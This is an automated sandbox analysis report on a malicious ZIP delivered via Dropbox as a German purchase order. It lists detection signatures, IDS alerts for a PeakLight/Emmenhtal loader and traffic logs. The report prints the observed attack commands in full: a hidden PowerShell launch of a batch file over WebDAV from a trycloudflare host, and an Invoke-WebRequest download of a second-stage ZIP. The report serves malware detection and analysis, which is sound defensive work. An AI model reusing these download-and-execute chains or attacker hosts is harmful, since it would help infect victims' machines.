Play interactive tourEdit tour

Windows Analysis Report
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0

Overview

General Information

Sample URL:	https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
Analysis ID:	1541917
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: rundll32 run dll from internet

Suricata IDS alerts for network traffic

Downloads suspicious files via Chrome

Opens network shares

Suspicious powershell command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

×

System Summary

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1668, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 6880, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1668, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }", ProcessId: 6880, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze", CommandLine: powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4824, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze", ProcessId: 5016, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: rundll32 run dll from internet

Source: Process started

Author: Joe Security: Data: Command: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/, CommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6988, ProcessCommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/, ProcessId: 6336, ProcessName: rundll32.exe

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Compliance

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.223.108.114:443 -> 192.168.2.17:58412 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58413 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58415 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58416 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:58418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:58419 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.166:443 -> 192.168.2.17:58428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.17:58442 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58432 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58424 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.17:58435 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58430 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.17:58436 -> 104.16.230.132:443

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.17:58411 -> 1.1.1.1:53

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0 HTTP/1.1Host: dl.dropboxusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+burwd2gSRS3DpE&MD=F+m3pX57 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+burwd2gSRS3DpE&MD=F+m3pX57 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /DE/bestellung-DKM00392pdf.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: theme-crack-emissions-perspectives.trycloudflare.com
Source: global traffic	HTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -240X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAeTJB6GQoR3vFznZlEH0f2JYwWvPqjVxhhPZcNRxCuEa8rg2vF0%2B48tez2f%2B2ZaBCq2LMDmMhd2RqYDnZgQ%2BxO%2BCYYqrgaG4c9ODFtmn1shIOTEeSj6lTMoJ22RdI83MoMGqn7ZzTa5ywHlxMlUgzz2PTgBOTPK6FN1x%2Bv5aY%2BAqQlWGJQyhrvJR1ynwLYow4udbf%2Bt5XF7wdXy%2BdmAWA8AHlzXs8HZ6ZKCjmDTtNIwUvZVO1990xqukNh4hthSqVqWhtehTkACCLiRDzJvnWn/3MYPSxap3omIguycIVu3jnipHXN05qZW%2BP8aYQay9ddn2SzW6lkRXfea0OevD%2BHcQZgAAEGWEtZJPhf/IgR%2B72EZr4tiwAZOG/sn2HWBKXFYU4/oKI1Sqw9fYWGfbjkeosWd9hw%2BDC4hR/mGSyt%2B03As/9aXmz5YH6XTV0pNi30ZLy4ZFX/iIB4svD2kMWUxhDTTejlgjgnzHJacikhh42nA46f1fNg4CxR/FwhDYblDTPgAkStTho8biFQamjQOOvBRjEc1W0Gnh26rtIw2CwB3ErC0PwcshYCjpXxo/zwTAeJOFdpcjXUDVHe27g%2B71OkuzyGEG7NkTQhTSKy3zei5TSOQVZzbvAc2eXPbOBNFnqD0CeVP4Te2GEQrYq%2BUeWd/vW2xGbe90GiSV9N975/wF/o%2BhdMieHOegaLIw5mxhMVZJw6mXgAgytNOb39FhQu5ll6ZmFkne95amvgOTcr5AXKPLCIezgzqRipCHoD74VNfoyB4JPq/38Uhwgh2c4tMoXrF%2B8bijhGem%2BLq7QK9PSOkeTybpWOwYm2WKmqdjLUaNHD5LY3oCjVTsJT23SQ/SIeb8aJc6s9ZOUtL2uclqBs/dMYMA0Zlkz2xp1Qfcw01Hi1qGtrHubkawh59S1lXd3m7gxdmTnee0ZFBGL41cySdnFNoB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1729844189User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 22FB18B5D25C449CA38B28C3BD9A9077X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic	HTTP traffic detected: GET /tue.bat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: theme-crack-emissions-perspectives.trycloudflare.com
Source: global traffic	HTTP traffic detected: GET /toto.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: retailer-indicators-resume-key.trycloudflare.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT

Performs DNS lookups

Source: global traffic	DNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: retailer-indicators-resume-key.trycloudflare.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Oct 2024 08:16:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8d80c3ed2f474677-DFWCF-Cache-Status: DYNAMICServer: cloudflare

URLs found in memory or binary data

Source: 77EC63BDA74BD0D0E0426DC8F80085060.34.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000024.00000002.2355149096.0000013E38180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://retailer-indicators-resume-key.trycloudflare.com
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2406744856.0000013E4EBF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.34.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37D05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudfla
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com
Source: powershell.exe, 00000024.00000002.2351437707.0000013E34B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip&
Source: powershell.exe, 00000024.00000002.2352815037.0000013E34C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip;
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B49000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000003.2318311250.0000025D62B4F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2350815549.0000025D62B4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipO
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipWindows##
Source: powershell.exe, 00000024.00000002.2352815037.0000013E34C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipX
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipxit
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B53770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.1742704031.0000028904A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001F.00000002.1961788980.000002068657C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001F.00000002.1961788980.0000020686586000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B537CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/#
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686586000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/55theme-crack-emissions-perspectives.tr
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.1565812654.0000020B53770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/C:
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk:
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkC:
Source: rundll32.exe, 00000018.00000002.1742704031.0000028904A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkL
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkq
